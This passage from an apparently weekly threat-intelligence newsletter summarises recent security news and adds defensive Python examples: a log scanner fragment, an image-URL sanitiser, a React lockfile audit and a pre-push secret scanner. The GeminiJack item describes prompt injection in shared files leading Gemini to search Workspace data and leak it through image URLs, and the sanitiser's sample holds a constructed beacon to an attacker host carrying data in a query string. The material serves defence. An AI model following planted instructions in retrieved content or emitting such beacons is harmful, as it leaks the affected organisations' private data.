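2025-12-09 03:20:19 10.0.0.9 GET /portal/files - 200
"""

if __name__ == "__main__":
    # "16.11.10000.1" is a constructed older build number, not a real release.
    print("vulnerable build:", is_vulnerable_build("16.11.10000.1"))
    for hit in scan_log_lines(SAMPLE_LOG.splitlines()):
        print(hit)
```

Feed it the real IIS logs (one line per request) and the build string from the product's About page; a hit on either indicator means the machine keys should be rotated as Gladinet advises, because any ticket minted with the old keys remains forgeable until they change.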

Google Patches AI Flaw That Turned Gemini Into a Spy
Google addressed a critical vulnerability in Gemini Enterprise, dubbed GeminiJack by its discoverers, which let attackers exfiltrate corporate data via poisoned documents, emails, or calendar invites with no user interaction. The attack abused the retrieval-augmented generation (RAG) architecture: hidden instructions in shared files caused Gemini to search for sensitive terms across Workspace data (Gmail, Docs, Calendar) and to send the results out through disguised image URLs. The zero-click flaw bypassed traditional security tools, as no malware or unauthorized data channel was involved; the data left through the ordinary fetch that renders an image. Noma Labs discovered the issue, prompting Google to change how Gemini and Vertex AI interact with retrieval systems. The attack highlights the risk of blending untrusted content with an AI agent’s privileged access and underscores that emerging AI-native threats require explicit trust boundaries around retrieved content.
Read full article: Bankinfosec
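The exfiltration channel in this attack is the image fetch the client performs automatically, so one architectural safeguard sits on the output side: before a model response is rendered, strip image references whose URL points outside an asset allowlist or smuggles data in a query string. The guard below is an added example, not Google's fix and not Noma Labs' proof of concept; the hostnames in the sample response are constructed, and the allowlist would be an organisation's own asset domains.

```python
"""Output-side guard for the image-URL exfiltration channel described above: before a
model response is rendered, find image references whose URL is outside the allowlist or
carries a query string, and neutralise them so the renderer never fetches them.

Added example, not Google's fix and not Noma Labs' proof of concept. The hostnames in
the sample response are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Markdown ![alt](url) and HTML <img src="url">: the two forms a chat renderer turns into an
# automatic, zero-click HTTP request.
IMAGE_REF = re.compile(
    r'!\[[^\]]*\]\((?P<md>[^)\s]+)[^)]*\)'
    r'|<img\b[^>]*\bsrc=["\'](?P<html>[^"\']+)["\'][^>]*>',
    re.IGNORECASE,
)


def classify_image_url(url: str, allowed_hosts: set[str]) -> str | None:
    """Return a reason the URL should be blocked, or None if it is acceptable."""
    parts = urlsplit(url)
    if parts.scheme not in ("https", ""):        # data:, http:, javascript: all refused
        return f"scheme {parts.scheme!r} not allowed"
    if parts.hostname and parts.hostname.lower() not in allowed_hosts:
        return f"host {parts.hostname!r} not in allowlist"
    if parts.query or parts.fragment:
        # Retrieved data is smuggled out in the query string; allow only bare asset paths.
        return "query string or fragment present"
    if len(url) > 512:
        return "URL too long for an asset reference"
    return None


def sanitize_response(text: str, allowed_hosts: set[str]) -> tuple[str, list[tuple[str, str]]]:
    """Replace every disallowed image reference with a visible placeholder.
    Returns (clean_text, [(url, reason), ...]) so blocked URLs can be logged and alerted on."""
    blocked: list[tuple[str, str]] = []

    def replace(match: re.Match) -> str:
        url = match.group("md") or match.group("html")
        reason = classify_image_url(url, allowed_hosts)
        if reason is None:
            return match.group(0)
        blocked.append((url, reason))
        return "[image removed: untrusted reference]"

    return IMAGE_REF.sub(replace, text), blocked


# Constructed sample model output: a legitimate logo followed by two injected beacons.
SAMPLE_RESPONSE = (
    "Here is the summary you asked for.\n"
    "![logo](https://assets.corp.example/logo.png)\n"
    "![ ](https://collector.attacker.example/p.png?d=Q4+revenue+forecast+and+Acme+deal)\n"
    '<img src="https://assets.corp.example/x.png?u=alice%40corp.example">\n'
)
ALLOWED_HOSTS = {"assets.corp.example"}

if __name__ == "__main__":
    clean, blocked = sanitize_response(SAMPLE_RESPONSE, ALLOWED_HOSTS)
    print(clean)
    for url, reason in blocked:
        print("blocked:", reason, url)
```

The second sample beacon matters: it uses an allowed host but still carries exfiltrated data in its query string, which is why the check rejects any query component rather than trusting the host alone. Blocking at render time does not remove the prompt-injection itself, so the blocked list should feed detection, and the retrieval layer still needs its own trust boundary.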

Denial of service and source code exposure in React Server Components
The React Team disclosed two new vulnerabilities in React Server Components: a High Severity Denial of Service (DoS) and a Medium Severity Source Code Exposure. The DoS (CVE-2025-55184, CVE-2025-67779) allows crafted HTTP requests to trigger infinite loops that hang the server. The Source Code Exposure (CVE-2025-55183) risks leaking hardcoded secrets via server function code. Affected packages (react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack) require immediate upgrade to versions 19.0.3, 19.1.4, or 19.2.3, as the prior patches (19.0.2, 19.1.3, 19.2.2) were incomplete. Frameworks like Next.js and React Router are impacted if they use React Server Components. Hosting providers applied mitigations, but users must update to fully resolve the risk.
Read full article: Hackernews

Half of exposed React servers remain unpatched amid active exploitation
A critical React server-side vulnerability (CVE-2025-55182), dubbed React2Shell, remains unpatched in 50% of exposed systems despite active exploitation by over 15 attack clusters. These range from cryptominers to state-linked threat actors deploying tools like Sliver C2, BPFDoor, and EtherRat variants. Attackers are increasingly using anti-forensics techniques to evade detection, while Chinese and North Korean groups are suspected in targeted intrusions. The flaw, affecting React Server Components and frameworks like Next.js, enables remote code execution via unsafe deserialization. React’s widespread use in cloud environments amplifies risks, as patching lags despite rapid weaponization of the bug.
Read full article: Theregister
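The two React items above share a practical question: which resolved react-server-dom-* versions in a project are at or beyond the complete fix for their line, given that the earlier 19.x.1 and 19.x.2 releases still leave at least one of the listed CVEs open. The lockfile audit below is an added example, not the React team's tooling; the package names and fixed versions are the ones the articles give, and the package-lock content is constructed.

```python
"""Lockfile audit for the two React Server Components items above: report whether each
resolved react-server-dom-* package is at or beyond the complete fix for its 19.x line
(19.0.3 / 19.1.4 / 19.2.3). The earlier patch releases (19.x.1, 19.x.2) still count as
exposed to at least one of the CVEs listed.

Added example, not the React team's tooling. Package names and fixed versions are those
in the articles; the lockfile content is constructed.
"""
import json
import re

AFFECTED_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}
# Complete fix per 19.x line, as stated in the advisory.
FIXED_BY_LINE = {(19, 0): (19, 0, 3), (19, 1): (19, 1, 4), (19, 2): (19, 2, 3)}

SEMVER = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?")


def parse_version(version: str):
    """Split '19.2.3-canary-abc' into ((19, 2, 3), 'canary-abc'); the pre-release part may be None."""
    match = SEMVER.match(version.strip())
    if not match:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(x) for x in match.group(1, 2, 3)), match.group(4)


def fix_status(version: str) -> str:
    """'fixed', 'vulnerable', or 'unknown' (a line the advisory does not cover: check manually)."""
    core, pre = parse_version(version)
    fixed = FIXED_BY_LINE.get(core[:2])
    if fixed is None:
        return "unknown"
    if core > fixed:
        return "fixed"
    # A pre-release of the fixed version (19.2.3-canary-...) sorts below 19.2.3 under semver.
    if core == fixed and not pre:
        return "fixed"
    return "vulnerable"


def audit_lockfile(lock_json: str) -> list:
    """Walk an npm package-lock (v2/v3) 'packages' map, including nested node_modules entries,
    and return (path, version, status) for every affected package found."""
    lock = json.loads(lock_json)
    results = []
    for path, meta in lock.get("packages", {}).items():
        name = path.rsplit("node_modules/", 1)[-1]
        if name in AFFECTED_PACKAGES and "version" in meta:
            results.append((path, meta["version"], fix_status(meta["version"])))
    return results


# Constructed package-lock excerpt: one package on the incomplete patch, one nested copy that
# is fully fixed, and one canary build of the fixed version.
SAMPLE_LOCK = json.dumps({
    "name": "app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "app"},
        "node_modules/react": {"version": "19.2.3"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.2"},
        "node_modules/legacy-tool/node_modules/react-server-dom-parcel": {"version": "19.1.4"},
        "node_modules/react-server-dom-turbopack": {"version": "19.2.3-canary-abc123"},
    },
})

if __name__ == "__main__":
    for path, version, status in audit_lockfile(SAMPLE_LOCK):
        print(f"{status:10s} {version:22s} {path}")
```

Run it over every package-lock.json in the estate, including ones inside framework wrappers such as Next.js deployments, since a nested copy of an affected package under another dependency is just as reachable by a crafted request as the top-level one. Pre-release builds are reported as vulnerable on purpose; anything the script labels unknown needs a manual look rather than a pass.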

10K Docker images spray live cloud creds across the internet
A recent analysis by Flare revealed over 10,000 public Docker Hub images exposing live cloud credentials, including API keys for AI services, production systems, and critical infrastructure from 100+ organizations, such as a Fortune 500 company and a major bank. Nearly half contained five or more secrets, enabling attackers to exploit multiple systems via a single pull. Many leaks stemmed from unmonitored “shadow IT” accounts, like a bank contractor’s registry with 430+ unprotected images. Despite removals, 75% of exposed credentials remained active. Flare urged developers to adopt secrets management tools and pre-push scanning to prevent breaches.
Read full article: Theregister
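The fix Flare recommends, scanning before the push, is simple to wire into a pipeline: walk the files that will land in the image and fail the build on anything that looks like a credential. The sweep below is an added example, not Flare's tooling. Its pattern set is deliberately small and illustrative, the sample files are constructed, and the AWS access key in them is Amazon's documented placeholder value rather than a real credential.

```python
"""Pre-push secret sweep over the files that would end up in an image, in the spirit of
the Flare recommendation above. Run it against the build context, or against the layers
extracted from `docker save`, before `docker push`; any finding should fail the pipeline.

Added example, not Flare's tooling. The detector patterns are a small illustrative set;
the sample files are constructed and the AWS key is Amazon's documented example value.
"""
import os
import re

# A small set of high-signal patterns. Production scanners ship hundreds; the structure is
# what matters here: a name, a regex, and redaction of whatever matched.
SECRET_PATTERNS = [
    ("aws access key id", re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("aws secret access key",
     re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})")),
    ("github token", re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b")),
    ("private key block", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----")),
    ("sk- style api key", re.compile(r"\bsk-[A-Za-z0-9]{20,}\b")),
    ("generic secret assignment",
     re.compile(r"(?i)\b(?:api[_-]?key|secret|token|password)\b\s*[=:]\s*['\"]?[A-Za-z0-9_\-/+=]{16,}")),
]

# Files that exist only to hold credentials: report them by name even if no pattern fires.
SENSITIVE_NAMES = {".env", ".netrc", ".npmrc", "credentials", "id_rsa", "id_ed25519"}


def redact(secret: str) -> str:
    """Keep just enough of a match to locate it in the file without reprinting the secret."""
    return secret[:6] + "..." + secret[-2:] if len(secret) > 12 else "***"


def scan_text(path: str, text: str) -> list:
    """Return (path, line_number, detector, redacted_match) for each pattern hit in one file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SECRET_PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append((path, lineno, name, redact(match.group(0))))
    return findings


def scan_tree(files: dict) -> list:
    """files maps relative path -> content. A Dockerfile `COPY . .` pulls in every one of these."""
    findings = []
    for path, content in files.items():
        if os.path.basename(path) in SENSITIVE_NAMES:
            findings.append((path, 0, "credential file present", ""))
        findings.extend(scan_text(path, content))
    return findings


def scan_directory(root: str) -> list:
    """Load a build context (or an extracted image layer) from disk and scan it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="ignore") as handle:
                    files[os.path.relpath(full, root)] = handle.read(1_000_000)
            except OSError:
                continue
    return scan_tree(files)


# Constructed build context: one clean file and three that should never reach a registry.
SAMPLE_FILES = {
    "app/config.py": "DEBUG = False\nOPENAI_API_KEY = 'sk-" + "a" * 24 + "'\n",
    ".env": ("AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
             "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"),
    "deploy/key.pem": "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEA\n",
    "README.md": "Run `make build`, then push to the registry.\n",
}

if __name__ == "__main__":
    for finding in scan_tree(SAMPLE_FILES):
        print(finding)
```

Scanning the build context catches what a `.dockerignore` should have excluded; scanning the layers from `docker save` additionally catches secrets that a multi-stage build or a `RUN` step wrote into the image, which the 75% of still-live credentials in Flare's sample suggest is the more common way they leak. Wire `scan_directory` into CI so a non-empty result blocks the push, and rotate anything it reports rather than just deleting the file, since the layer history keeps the bytes.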


In-Depth Expert CTI Analysis

Global law enforcement disrupted major cybercriminal operations, including Europol’s takedown of a $700M crypto laundering network and the DoJ’s crackdown on AI chip smuggling to China, while ransomware groups increasingly targeted critical infrastructure, exemplified by attacks on healthcare providers and Aeroflot’s supply chain. State-aligned actors exploited vulnerabilities in software like React and GeoServer, with Chinese APTs deploying advanced malware for espionage and Russian-linked hacktivists breaching U.S. water systems. Emerging threats included AI-driven fraud, Rust-based ransomware, and sophisticated phishing kits bypassing MFA, alongside persistent risks from exposed credentials in platforms like Docker Hub and unpatched zero-days in Chrome and Gogs.


Proactive Defense and Strategic Foresight

Proactive defense demands anticipatory measures, as seen in Europol’s disruption of crypto laundering infrastructure and the DoJ’s export control enforcement, targeting adversarial capabilities before exploitation. Strategic foresight requires addressing evolving threats like AI-driven synthetic fraud, state-aligned ransomware, and third-party vulnerabilities exemplified by Aeroflot’s supply-chain breach and Gladinet’s cryptographic flaws. The surge in AI-native attacks (GeminiJack) and unpatched critical vulnerabilities (React2Shell, GeoServer) underscores the urgency of continuous threat modeling, zero trust architectures, and cross-sector intelligence sharing. Organizations must prioritize hardening OT systems, securing AI integrations, and enforcing stringent vendor oversight to mitigate cascading risks in an increasingly interconnected threat landscape.


Evolving Ransomware and Malware Tactics

Ransomware and malware tactics are rapidly evolving, leveraging AI-generated deepfakes, Rust-based cross-platform code, and supply chain vulnerabilities to maximize impact. Recent incidents highlight aggressive targeting of critical infrastructure (e.g., healthcare, aviation) via third-party vendors and zero-day exploits, while ransomware-as-a-service models like VolkLocker lower entry barriers for attackers. Advanced evasion techniques, including the Shanya packer-as-a-service and EDR-killing BYOVD attacks, challenge detection. Geopolitical hacktivists and state-aligned groups increasingly weaponize low-skill tactics, such as exposed OT access, to disrupt operations. Meanwhile, AI-driven social engineering and synthetic identity fraud enable hyper-targeted phishing, underscoring the need for robust identity verification and proactive third-party risk management.


State-Sponsored and Organized Cybercrime Convergence

The convergence of state-sponsored and organized cybercrime is accelerating, evidenced by blurred operational tactics and shared infrastructure. Pro-Russian hacktivist groups (e.g., CyberArmyofRussia_Reborn) targeting U.S. critical infrastructure with low-skill attacks mirror state objectives, while Indonesian cybercrime networks exhibit nation-state level sophistication. Chinese APTs like Brickworm deploy dual-use malware for espionage and sabotage, while ransomware groups (GOLD SALEM) adopt state-aligned tradecraft. Criminal laundering networks leverage deepfakes and crypto platforms akin to disinformation campaigns, and tools like ValleyRAT transition from exclusive military use to commodified cybercrime. This symbiosis erodes attribution, amplifies global risks, and demands coordinated defenses against hybrid threats exploiting geopolitical and financial motives.


Operational and Tactical Implications

Operational Implications: Cross-border collaboration remains critical in disrupting large-scale cybercriminal networks, as seen in Europol’s takedown of crypto laundering infrastructure and the DoJ’s export control enforcement. Persistent vulnerabilities in third-party vendors (e.g., Aeroflot’s breach via Bakka Soft) and supply chains (Asus, NHS) demand rigorous vendor risk management. Regulatory pressures, such as the EU’s DSA fines and CISA’s GeoServer mandate, require organizations to prioritize transparency, patch management, and compliance.


Tactical Implications: Threat actors increasingly exploit weak security controls, including weak authentication (LastPass, Gladinet), unpatched vulnerabilities (Clop, React2Shell), and social engineering (AI-generated resumes, HR-themed phishing). Ransomware groups and APTs leverage advanced tooling (Rust-based 01flip, Shanya packer) and hybrid tactics (hacktivism/RaaS). Defenders must enforce MFA, segment OT/IT networks, monitor for credential leaks (Docker Hub), and adopt AI-resistant verification to counter deepfakes and synthetic fraud. Proactive threat hunting is essential against evolving C2 frameworks (Brickworm, GhostFrame).


Forward-Looking Recommendations

  • Enhance international collaboration to dismantle cross-border cybercrime networks, focusing on cryptocurrency laundering and infrastructure takedowns.
  • Strengthen supply chain security through rigorous vendor assessments and real-time monitoring to mitigate third-party risks.
  • Prioritize AI-driven threat detection to counter deepfake scams, ransomware, and evolving malware like Rust-based 01flip.
  • Mandate stricter identity verification and transparency for digital platforms to combat impersonation and synthetic fraud.
  • Enforce zero-trust architectures and secrets management to prevent credential leaks from exposed databases and cloud services.
  • Invest in securing operational technology (OT) systems and critical infrastructure with segmentation and proactive vulnerability patching.
  • Adopt legislative measures to regulate algorithmic stablecoins and hold crypto platforms accountable for fraud prevention.
  • Expand cybersecurity training for employees to counter phishing, social engineering, and AI-augmented attacks.
  • Accelerate patch management and threat intelligence sharing to address zero-day exploits and unpatched vulnerabilities.
  • Develop AI-specific security frameworks to mitigate risks from retrieval-augmented generation (RAG) and adversarial data poisoning.

Additional Resources & Contact

VerSprite on LinkedIn

VerSprite on Twitter

Email VerSprite